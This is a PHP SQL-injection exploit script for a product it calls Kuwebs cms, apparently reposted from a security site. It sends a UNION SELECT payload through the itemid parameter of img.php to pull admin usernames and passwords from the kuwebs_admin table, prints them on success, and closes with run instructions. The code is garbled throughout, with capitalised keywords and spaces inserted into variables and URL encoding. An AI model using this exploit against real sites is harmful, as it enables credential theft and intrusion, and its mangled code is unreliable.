<? Php
Error_reporting (E_ERROR );
Print_r ('
+ --------------------------------------------------------------------- +
Kuwebs cms SQL injection exp
Home: www.hkmjj.com www.2cto.com
+ --------------------------------------------------------------------- +
');
If ($ argc <2 ){
Print_r ('
Usage: php '. $ argv [0]. 'Host/path
Example: php '. $ argv [0].' 127.0.0.1 cc
');
Die ();
}
Ob_start ();
$ Host = $ argv [1];
$ Path = $ argv [2];
$ Sock = fsockopen ($ host, 80, $ errno, $ errstr, 30 );
If (! $ Sock) die ("$ errstr ($ errno) \ n ");
Fwrite ($ sock, "GET/$ path/img. php? Lang = cn & itemid = 58% 20and % 201 = 2% 20 union % 20 select % 201, concat (0x6F756F757E, adminuser, 0x2D, adminpassword, 0x7E31,, 35 + from + kuwebs_admin % 20 -- HTTP/1.1 \ r \ n ");
Fwrite ($ sock, "Host: $ host \ r \ n ");
Fwrite ($ sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv: 6.0.2) Gecko/20100101 Firefox/6.0.2 \ r \ n ");
Fwrite ($ sock, "Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 \ r \ n ");
Fwrite ($ sock, "Accept-Language: zh-cn, zh; q= 0.5 \ r \ n ");
Fwrite ($ sock, "Connection: keep-alive \ r \ n ");
$ Headers = "";
While ($ str = trim (fgets ($ sock, 1024 )))
$ Headers. = "$ str \ n ";
$ Body = "";
While (! Feof ($ sock ))
$ Body. = fgets ($ sock, 1024 );
Fclose ($ sock );
Ob_end_flush ();
// Print_r ($ body );
If (strpos ($ body, 'ouou ')! = False ){
Preg_match ('/ouou ~ (.*?)~ 1/', $ body, $ arr );
$ Result = explode ("-", $ arr [1]);
Print_r ("Exploit Success! \ Nusername: ". $ result [0]." \ npassword: ". $ result [1]." \ n ");
}
Else {
Print_r ("Exploit Failed! \ N ");
}
?>
Save exp. php run
Php.exe exp. php 127.0.0.1
From: hkmjj.com